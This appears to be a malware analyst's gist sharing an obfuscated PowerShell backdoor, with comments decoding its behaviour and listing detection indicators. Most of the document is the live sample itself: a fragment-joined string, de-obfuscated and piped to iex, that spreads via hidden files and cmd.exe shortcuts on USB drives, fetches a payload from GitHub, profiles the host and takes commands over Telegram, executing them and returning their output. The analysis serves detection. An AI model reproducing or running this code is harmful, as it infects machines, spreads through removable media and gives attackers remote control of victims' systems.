@usualsuspect
Created November 25, 2022 17:24
Unknown PowerShell backdoor using Telegram/GitHub
# Analyst notes (review): obfuscated PowerShell sample, kept byte-identical below.
# The whole payload is a single string literal assembled from '+'-joined
# fragments; the -replace chain on the final line restores the real characters
# before the result is piped to iEX. The substitutions, read off that line:
#   POG -> `   (backtick; "POGn" therefore becomes a `n newline escape)
#   byf -> \   (path separator)
#   sn4 -> '   (single quote)
#   ugE -> |   (pipeline)
#   NyQ -> $   (variable sigil)
#   zCw -> "   (double quote)
# The fragment splitting and the token substitution appear intended to defeat
# simple string matching on the encoded form; detections should key on the
# decoded behaviour listed below rather than on the literal text.
#
# Behaviour visible in the decoded text:
#   - Forces TLS 1.2, sets ErrorActionPreference=Continue, then loops with a
#     random delay until an HTTP request to api.telegram.org returns 200
#     (connectivity gate before anything else runs).
#   - Registers an in-session WMI event subscription (Register-WmiEvent,
#     SourceIdentifier "USBFlashDrive") on __InstanceCreationEvent for
#     Win32_LogicalDisk with DriveType = 2 (removable media), polled every 5 s.
#     The action, for each removable drive: expands %TEMP%\xxx.zip (if that
#     fails, fetches raw.githubusercontent.com/efimovah/abcd/main/xxx.gif via
#     Start-BitsTransfer to %TMP%\xxx.zip and expands it), copies %TEMP%\xxx
#     to <drive>\dism, writes <drive>\system.bat ("@echo off / cd %cd%dism /
#     start dism.exe / exit"), marks dism, dism\*.* and system.bat +s +h, then
#     for every top-level folder (except dism, $RECYCLE.BIN, System Volume
#     Information) and every *.pdf on the drive sets +s +h on the original and
#     creates a same-named .lnk whose target is %SystemRoot%\System32\cmd.exe
#     with arguments "/c start explorer <name> && system.bat && exit"
#     (folder icon from SHELL32.dll,4; PDF icon from msedge.exe,13).
#   - Single-instance guard: a named mutex equal to %COMPUTERNAME%; exits if it
#     cannot be acquired within 1 ms.
#   - Reads three "<token>::<chat id>" pairs from HKCU:\Environment values GUID,
#     GUID1 and GUID2, and the last-processed message date from the "date"
#     value of the same key. The bot tokens are not in this script; some earlier
#     stage not shown here must have written them.
#   - Profiles the host (whoami, public IP/geo from http://ip-api.com/json,
#     local IPv4, Win32_ComputerSystem model, C: disk FriendlyName, OS Version
#     and ProductType, AntivirusProduct names from root/SecurityCenter2) into
#     one banner and reports it with Telegram sendMessage as "new connection!"
#     or "reconnected!" (up to 5 attempts, random back-off).
#   - C2 loop (while(1), random delay up to 99 s): calls getUpdates on each
#     token, keeps messages whose chat.id is one of the configured ids and
#     whose date is newer than the stored one, persists the new date, and
#     parses text as "<host[,host...]|all> :: <task>". When this host is
#     addressed, <task> is piped through the alias 4ID, which is defined as
#     ((gal i??)[1]) - presumably resolving to iex; confirm on the target
#     build - with -ErrorVariable b, and stdout (and the error stream, if any)
#     is sent back after the banner, truncated to 4080 minus the banner length.
#     Tokens, ids and date are re-read from the registry on every iteration.
#
# Detection / mitigation hooks grounded in the above: Register-WmiEvent with
# SourceIdentifier "USBFlashDrive" from powershell.exe; a BITS job to
# raw.githubusercontent.com; powershell.exe talking to api.telegram.org and
# ip-api.com; HKCU\Environment values GUID, GUID1, GUID2, date; a named mutex
# equal to the hostname; %TEMP%\xxx.zip and <drive>\dism\dism.exe; .lnk files
# on removable drives targeting cmd.exe next to hidden+system folders/PDFs.
(('[Net.ServicePointManager]::Se'+'curityProtocol=[Net.SecurityProtocolType]::Tls12;
NyQErrorActionPreference=zCwContinuezCw;
NyQa=zCwap'+'i.telegram.orgzCw;
do{Slee'+'p(Get-Random 100)}while'+'((iwr NyQa).StatusCode -ne 20'+'0)
NyQ'+'Query = zCwselect * from __InstanceCreationE'+'vent within 5 where Target'+'Instance'+' ISA sn4Win32_LogicalDisk'+'sn4 and TargetInstance.DriveType = 2zCw;
Ny'+'QAction = {
(gwmi cim_logicaldiskugE?{(NyQ_.drivetype -eq 2)-and(T'+'est-path '+'z'+'CwNyQ(NyQ_.dev'+'iceid)byfzCw)'+'}).DeviceIDugE%'+'{
'+' if(NyQnull'+' -eq NyQ_){return}
'+'
try{Expand-Archive -Path zCwNyQenv:tempbyfxxx.zipzCw -DestinationPath zCwNyQenv:te'+'mpzCw -force}catch{
NyQuri = zCwhttps://raw.'+'githubusercontent.c'+'om/efimovah/abcd/main/xxx.gifzCw;
Start-Bi'+'tsTransfer -Source NyQuri -Destination zC'+'wNyQEnv:tmpbyf'+'xxx.zipzCw;
Expa'+'nd-Archive -Path'+' zC'+'wNy'+'Qenv'+':tempbyfxxx.zipzCw -DestinationPath zCwNyQenv:tempzCw -force}
cp zCwNyQenv:tempbyfxxxzCw zCwNyQ_byfdismzCw -Recurse -Force;
sc '+'zCwNyQ_byfsystem.batzCw -'+'value '+'zCw@echo offPOGncd %cd%dismPOGnstart dism.exePOGnexi'+'tzCw;
attrib '+'+s +h zCwNyQ_byfdismzCw;attrib +s +h zCwNyQ_'+'byfdismbyf*.*zCw;attrib +'+'s +h zCwNyQ_byfsystem.batzCw;
('+'Gci zCwNyQ_byfzCw -Directory -force)ugE?{NyQ_.name -notin (sn4dismsn4,sn4NyQRECYCLE.BINsn4,sn4System '+'Volume Informationsn4)}ugE%{
'+' '+' if(NyQnull -eq NyQ_){return}
a'+'ttrib +s '+'+h zCwNyQ(NyQ_.fullname)zCw
NyQWshShell = New-Object -com'+'Ob'+'ject WScript.Shell
NyQ'+'Shortcut = '+'NyQWshShell.CreateShortcut(zCwNyQ(NyQ_.fullname).lnkzCw)
NyQShortcut.TargetPath = '+'zCw%SystemRoot%b'+'yfSystem32byfcmd.exezCw
NyQShortcut.Argu'+'ments = zCw/c start '+'explorer NyQ(NyQ_.name) && sy'+'stem.bat && exitzCw
NyQShortcut.IconLocatio'+'n = zCw%SystemRoot%byfSystem32byfSHELL32.dll,4zCw
NyQSh'+'ortcut.WorkingDirectory = zCw%cd'+'%zCw
NyQShortcut.'+'Save()
}
(Gi zCwNyQ_byf*.pdfzCw -force)ugE%{'+'
'+' if(NyQnull -eq NyQ_){retur'+'n}'+'
at'+'trib +s +'+'h zCwNyQ'+'(NyQ_.fullname)zCw
NyQW'+'shShell = New-Object -comObject WScript.Sh'+'ell
NyQShortcut = NyQWshShell.CreateShortcut(zCwNyQ(NyQ_.fullname).lnkzC'+'w)
NyQShortcut.TargetPath = zCw%SystemRoot%byfS'+'ystem3'+'2b'+'yfcmd.exezCw
NyQShortcut.Ar'+'guments = zCw/c sta'+'rt explorer NyQ(NyQ_.name) && syste'+'m.bat && exitzCw
'+' NyQShortcut.IconLocation = zCwC:byfProgram Files (x86)byfMicrosoftbyfEdgebyfApplicationbyfmsedge.exe,13zCw
'+' NyQSh'+'ortcut.WorkingDirectory ='+' zCw%cd%zC'+'w
NyQShortcut.Save()
}
}
};
Reg'+'ister-WmiEvent'+' -Query NyQQuery -Action NyQAction -Sou'+'rceIden'+'tifier USBFlashDrive'+';
NyQcn=NyQenv:COM'+'PUTERNAME
if(-not(New-Obj'+'ect Th'+'reading.Mutex(NyQfalse, NyQcn)).WaitOne(1)){exit}
NyQreg='+'zC'+'wHKCU:byfEnvironmentzCw
while(-not Ny'+'Qip){Sleep(Get-Random 100);NyQip=irm zC'+'whttp://ip-api.com/jsonzCw}
NyQip_local = (Get-NetIPConfigurationugE?{NyQ_.IPv4DefaultGateway -ne NyQnull -and NyQ_.Ne'+'tAdap'+'ter.Status -ne zCwDisconne'+'ctedzCw}).IPv4Addre'+'ss.IPAddress
NyQtk,NyQid = '+'(gp NyQreg -name GUID)'+'.GUID -split zCw::zCw
NyQtk1,NyQid1 = (gp NyQ'+'reg -name GUID1).GUID1 -split zCw::zCw
NyQtk2,NyQi'+'d2 = '+'(gp NyQreg -name GUID2).GUID2 -split'+' zCw'+'::zCw
'+'NyQtks=@(NyQtk,NyQtk1,NyQtk2);NyQids=@(NyQid,Ny'+'Qid1,NyQid2)
NyQmodel = (Get-WmiObject win32_computersystem).model
NyQhd = (get-p'+'artition -DriveLetter CugEget-disk).FriendlyNam'+'e
NyQos,NyQtype = '+'sn4Versionsn4, sn4ProductTypesn4ugE%{(Get-CimInstanc'+'e -ClassName Win'+'32_OperatingSystem).NyQ_}
NyQav = ((Get-CimInstance -Namespace root/SecurityCenter2 -ClassNam'+'e AntivirusProduct).displayNameugEsort -Unique) -join'+' zC'+'w,zCw
NyQinfo = zCwNyQcn : NyQ(whoami) : NyQ(NyQip.countryCode)'+'-N'+'yQ(NyQip.region) : NyQ(NyQip.query) : NyQip'+'_local : NyQmodel : NyQhd : NyQos : NyQtype : NyQav :zCw
NyQur'+'i = zCwNyQa/botNyQtk/sen'+'dMessa'+'ge?ch'+'at_id=NyQid&t'+'ext=NyQinfozCw
NyQm=(gp NyQreg -name date).date;
NyQi=0;while(NyQi -lt 5){
NyQok = NyQnull;NyQi+=1
if(NyQm){'+'NyQok = (iwr zCwNyQuri reconnected!zCw).StatusCode
}else{NyQok = (iwr zCwNyQuri new connection!zC'+'w).StatusCode}
if(NyQok -eq'+' 200'+'){break}
'+' Sleep(Get-Random 1000);
}
sal 4ID (('+'gal i??)[1]'+')'+'
while(1){
Sleep(Get-Random 100);NyQt_msg=NyQtksugE%{
'+' NyQmg='+'(irm -Uri zC'+'wNyQa/botNyQ_/getUpdateszCw).result.'+'mes'+'sage;
NyQmgugEAdd-Member -Not'+'ePropertyName token -NotePropertyValue '+'Ny'+'Q_;NyQmg
}ugE?{NyQ_.chat.id -in NyQids}ugEsor'+'t date;
NyQt_msgugE%{
if(NyQm -lt NyQ_.date){
NyQm=NyQ_.date;s'+'p NyQreg -na'+'me date -value NyQm;
NyQname,NyQtask=NyQ_.text -split z'+'Cw ::'+' zCw;NyQname=NyQname -split zCw,zCw;
'+' if((NyQcn -i'+'n NyQname'+')-or(NyQname -like zC'+'wallz'+'Cw)) {
'+' NyQuri=zCwNyQa/botNyQ(NyQ_.token)/sendMessage?chat_id=NyQ(NyQ_.chat.id)&text=NyQinfozCw
'+' NyQms=(NyQtaskugE4ID -ErrorV'+'ariable b)ugEO'+'ut-String;
NyQi=0;while(Ny'+'Qi -lt 5){
'+' NyQok = NyQnull;NyQi+=1
NyQok = (iwr zCwNyQu'+'riPOGnNyQ(N'+'yQms['+'0..NyQ(4080-NyQinfo.Length)'+'] -join sn4sn4)zCw).StatusCode
'+' if(NyQb){iwr zCwNyQuriPOGnNyQ((NyQbugEout-string)[0..NyQ(4080-NyQinfo.Length)] -join sn4sn4)zCw}
'+' '+' Slee'+'p(Get-Random 1000);
}
}
}
NyQtks=@('+'NyQtk,NyQtk1,NyQtk2);Ny'+'Qids=@(NyQid,NyQid1,Ny'+'Qid2)
NyQm=(gp NyQreg -nam'+'e date).date
}'+'
}
')-REplACE 'POG',[Char]96 -REplACE([Char]98+[Char]121+[Char]102),[Char]92 -REplACE([Char]115+[Char]110+[Char]52),[Char]39 -crePlAce ([Char]117+[Char]103+[Char]69),[Char]124 -crePlAce 'NyQ',[Char]36 -crePlAce'zCw',[Char]34)| iEX